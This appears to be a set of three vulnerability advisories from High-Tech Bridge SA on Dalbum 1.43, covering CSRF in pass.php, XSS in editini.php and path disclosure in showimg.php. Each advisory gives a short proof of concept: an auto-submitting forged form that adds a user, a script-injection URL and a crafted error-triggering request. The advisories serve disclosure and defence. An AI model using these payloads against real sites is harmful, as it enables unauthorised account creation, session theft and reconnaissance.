===============================
Vulnerability ID: HTB22941
Reference: http://www.htbridge.ch/advisory/csrf_cross_site_request_forgery_in_dalbum.html
Product: Dalbum
Vendor: http://www.dalbum.org/( http://www.dalbum.org/)
Vulnerable Version:1.43
Vendor Notification:05 April 2011
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Risk level: Low
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/)
Vulnerability Details:
The vulnerability exists due to failure in the "pass.php" script to properly verify the source of HTTP request.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
Attacker can use browser to exploit this vulnerability. The following PoC is available:[html]<form action="http://[host]/pass.php" method="post" name="main"/><input name="user" value="1"type="hidden"/><input name="pass" value="1"type="hidden"/><input name="passc" value="1"type="hidden"/><inputtype="hidden" name="action" value="add"><inputtype="submit"id="btn" name="submit" value="Submit ››"></form><script>
document.getElementById('btn').click();</script>[/html]===============================
Vulnerability ID: HTB22943
Reference: http://www.htbridge.ch/advisory/xss_in_dalbum.html
Product: Dalbum
Vendor: http://www.dalbum.org/( http://www.dalbum.org/)
Vulnerable Version:1.43
Vendor Notification:05 April 2011
Vulnerability Type: XSS (Cross Site Scripting)
Risk level: Medium
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/)
Vulnerability Details:
The vulnerability exists due to failure in the "editini.php" script to properly sanitize user-supplied inputin"url" variable.
User can execute arbitrary JavaScript code within the vulnerable application.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
The following PoC is available:[code]
http://[host]/editini.php?album=/Sample%20album/&url=1%27%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
[/code]===============================
Vulnerability ID: HTB22942
Reference: http://www.htbridge.ch/advisory/path_disclousure_in_dalbum.html
Product: Dalbum
Vendor: http://www.dalbum.org/( http://www.dalbum.org/)
Vulnerable Version:1.43
Vendor Notification:05 April 2011
Vulnerability Type: Path disclosure
Risk level: Low
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/)
Vulnerability Details:
The vulnerability exists due to failure in the "showimg.php" script, it's possible to generate an error that will reveal the full path of the script.
A remote user can determine the full path to the web root directory and other potentially sensitive information.
The following PoC is available:[code]
http://[host]/showimg.php?file=/Sample%20album/sample.jpg&details=1&rotate[]=1[/code]